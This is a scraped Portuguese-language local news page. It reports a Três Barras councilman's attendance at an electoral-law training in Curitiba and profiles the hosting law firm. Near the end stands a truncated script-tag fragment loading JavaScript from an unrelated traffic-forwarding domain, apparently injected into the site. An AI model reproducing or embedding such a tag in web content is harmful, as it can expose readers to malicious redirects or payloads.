InícioPolíticaVereador Marco Antônio de Souza apresenta novidades jurídicas para eleições 2018

Vereador Marco Antônio de Souza apresenta novidades jurídicas para eleições 2018

Últimas notícias

Mega-Sena sorteia nesta terça-feira prêmio acumulado em R$ 53 milhões

As seis dezenas do concurso 2.738 serão sorteadas, a...

Veja as vagas de empregos disponíveis em Canoinhas e região

O serviço de intermediação de vagas da Prefeitura de...

Equipe de Capoeira de Três Barras participa de competição no Paraná

Neste domingo, 16, a equipe de capoeira do Grupo...

Vereador participou de treinamento na VG&P Advogados, uma das mais conceituadas em direito eleitoral do país.

 

 

A legislação eleitoral muda constantemente. Já faz muito tempo que uma eleição não ocorre com o mesmo texto jurídico da passada e isso fez com que diversos profissionais se especializassem especificamente neste assunto. Pensando no futuro e em como contribuir com a sociedade, foi que Marco Antônio de Souza, o Gorguinho, participou de um importante evento para atualização da legislação na VG&P – Vernalha Guimarães & Pereira Advogados.

 

 

O evento ocorreu no dia 22 de maio e contou com um completo treinamento sobre o direito eleitoral. Na ocasião foram apresentadas e estudadas as mudanças da legislação, as regras de campanha, como podem ser realizados os financiamentos, além de se destacar uma inovação, conhecida pelo termo “CrowdFunding”, que em tradução livre significa financiamento coletivo.

 

 

Ao retornar a Três Barras, Gorguinho, que além de advogado é vereador e presidente do diretório municipal do MDB, destacou que “estar atendo a toda a legislação eleitoral é fundamental”, uma vez que “ficou claro durante a apresentação da VG&P Advogados que não há mais espaço para o amadorismo”, comentou.  O advogado também informou que “cada vez mais a advocacia eleitoral deve ser levada a sério com a necessidade de uma preparação aprofundada”.

 

 

O evento aconteceu em Curitiba sob o título Propaganda e Financiamento na Nova Pré-Campanha Eleitoral. Além de Marco Antônio, seu sócio Rodrigo Zaleuski, também participou do treinamento.  Gorguinho destacou a bela estrutura, conhecimento avançado e recepção da VG&P Advogados aos participantes: “quero agradecer a hospitalidade de toda a equipe do referido escritório, em especial nas pessoas dos Drs. Luiz Eduardo Peccinin e Paulo Henrique Golambiuk”, finalizou.

 

 

Sobre a VG&P Advogados

 

A Vernalha Guimarães e Pereira Advogados (VGP) é um escritório de advocacia abrangente que atende as mais diversas áreas do direito corporativo, com forte atuação nas áreas do direito administrativo, cível, tributário, societário, trabalhista, médico, eleitoral e penal empresarial. Com mais de 17 anos de atendimento personalizado em todas as regiões do Brasil, atualmente é reconhecido como um dos escritórios mais admirados do país pelas grandes empresas (Chambers and Partners, Leaders League e Análise Advocacia 500).

 

 

Com escritórios em São Paulo (SP), Brasília (DF) e Curitiba (PR), VGP conta com uma equipe formada por mais de 125 profissionais altamente especializados, além do apoio de centenas de advogados correspondentes representando o escritório no país e no exterior.

 

 

 … src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.